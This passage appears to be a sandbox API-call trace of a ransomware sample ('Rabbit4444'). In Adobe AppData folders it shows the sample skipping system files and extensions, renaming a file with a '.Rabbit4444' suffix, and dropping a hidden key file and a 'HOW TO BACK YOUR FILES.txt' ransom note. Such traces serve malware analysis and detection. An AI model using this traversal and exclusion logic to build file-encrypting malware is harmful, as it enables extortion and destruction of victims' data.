lpString1="Logs") returned="Logs" [0053.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf64a8 [0053.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x72) returned 0x10dee8 [0053.877] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf64b0 | out: ListHead=0xf68b0, ListEntry=0xf64b0) returned 0xf6390 [0053.877] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78917ee8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x78917ee8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x658d53ae, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LogTransport2.cfg", cAlternateFileName="LOGTRA~1.CFG")) returned 1 [0053.877] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.877] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.877] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="Rabbit4444.exe") returned -1 [0053.877] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2=".") returned 1 [0053.878] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="..") returned 1 [0053.878] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="windows") returned -1 [0053.878] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="bootmgr") returned 1 [0053.878] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="pagefile.sys") returned -1 [0053.878] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="boot") returned 1 [0053.878] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="ids.txt") returned 1 [0053.878] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="NTUSER.DAT") returned -1 [0053.878] lstrcpyW (in: lpString1=0x130eba0, lpString2="LogTransport2.cfg" | out: lpString1="LogTransport2.cfg") returned="LogTransport2.cfg" [0053.878] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg", dwFileAttributes=0x0) returned 1 [0053.878] lstrlenW (lpString="LogTransport2.cfg") returned 17 [0053.878] lstrlenW (lpString="Rabbit4444") returned 10 [0053.878] lstrcmpiW (lpString1="sport2.cfg", lpString2="Rabbit4444") returned 1 [0053.878] lstrlenW (lpString=".dll") returned 4 [0053.878] lstrcmpiW (lpString1=".cfg", lpString2=".dll") returned -1 [0053.879] lstrlenW (lpString=".lnk") returned 4 [0053.879] lstrcmpiW (lpString1=".cfg", lpString2=".lnk") returned -1 [0053.879] lstrlenW (lpString=".ini") returned 4 [0053.879] lstrcmpiW (lpString1=".cfg", lpString2=".ini") returned -1 [0053.879] lstrlenW (lpString=".sys") returned 4 [0053.879] lstrcmpiW (lpString1=".cfg", lpString2=".sys") returned -1 [0053.879] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.879] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.879] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14518965762) returned 1 [0053.879] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=216) returned 1 [0053.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0053.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0053.879] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e0, lpName=0x0) returned 0x298 [0053.880] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e0) returned 0x70000 [0053.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0053.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0053.881] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0053.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0053.881] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14519200688) returned 1 [0053.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0053.881] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0053.881] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.881] CloseHandle (hObject=0x298) returned 1 [0053.882] CloseHandle (hObject=0x278) returned 1 [0053.882] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg.Rabbit4444") returned 80 [0053.882] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg.rabbit4444"), dwFlags=0x1) returned 1 [0053.882] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78917ee8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x78917ee8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x658d53ae, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LogTransport2.cfg", cAlternateFileName="LOGTRA~1.CFG")) returned 0 [0053.882] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0053.882] lstrcpyW (in: lpString1=0x130eba0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.882] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.883] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.883] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.883] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.884] CloseHandle (hObject=0x278) returned 1 [0053.884] CloseHandle (hObject=0x27c) returned 1 [0053.884] GetCurrentThreadId () returned 0xd98 [0053.884] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0053.884] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs" [0053.884] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10dee8 | out: hHeap=0xe0000) returned 1 [0053.884] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0053.884] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs" [0053.884] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\" [0053.884] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\.BFC0E91B00AE8A0620D3" [0053.884] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\logs\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.885] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.887] FlushFileBuffers (hFile=0x27c) returned 1 [0053.888] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.888] CloseHandle (hObject=0x27c) returned 1 [0053.889] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs") returned 56 [0053.889] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.889] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7894b39b, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x6606ebca, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9707a96, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0053.889] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.889] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.889] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.889] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.889] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7894b39b, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x6606ebca, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9707a96, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.889] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.889] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.889] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.889] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.889] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.889] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9707a96, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9707a96, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9707a96, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.889] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.889] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.889] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9707a96, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9707a96, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9707a96, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.889] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0053.889] lstrcpyW (in: lpString1=0x130ebaa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.889] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\logtransport2\\logs\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.890] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.890] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.890] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.890] CloseHandle (hObject=0x278) returned 1 [0053.890] CloseHandle (hObject=0x27c) returned 1 [0053.890] GetCurrentThreadId () returned 0xd98 [0053.890] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0053.890] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics" [0053.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120798 | out: hHeap=0xe0000) returned 1 [0053.891] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0053.891] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics" [0053.891] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\" [0053.891] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3" [0053.891] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\linguistics\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.892] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.895] FlushFileBuffers (hFile=0x27c) returned 1 [0053.895] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.896] CloseHandle (hObject=0x27c) returned 1 [0053.896] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics") returned 49 [0053.896] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.896] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715ca081, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe972dd80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0053.896] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.896] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.896] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.896] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.896] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715ca081, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715ca081, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe972dd80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.896] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.897] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.897] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.897] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.897] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.897] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe972dd80, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe972dd80, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe972dd80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.897] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.897] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.897] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe972dd80, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe972dd80, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe972dd80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.897] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0053.897] lstrcpyW (in: lpString1=0x130eb9c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.897] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Linguistics\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\linguistics\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.897] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.897] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.898] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.898] CloseHandle (hObject=0x278) returned 1 [0053.898] CloseHandle (hObject=0x27c) returned 1 [0053.898] GetCurrentThreadId () returned 0xd98 [0053.898] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0053.898] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights" [0053.898] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120728 | out: hHeap=0xe0000) returned 1 [0053.898] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0053.898] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights" [0053.898] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\" [0053.898] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\.BFC0E91B00AE8A0620D3" [0053.898] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\headlights\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.899] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.902] FlushFileBuffers (hFile=0x27c) returned 1 [0053.903] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.903] CloseHandle (hObject=0x27c) returned 1 [0053.904] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights") returned 48 [0053.904] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.904] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe972dd80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0053.904] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.904] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.904] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.904] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.904] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, 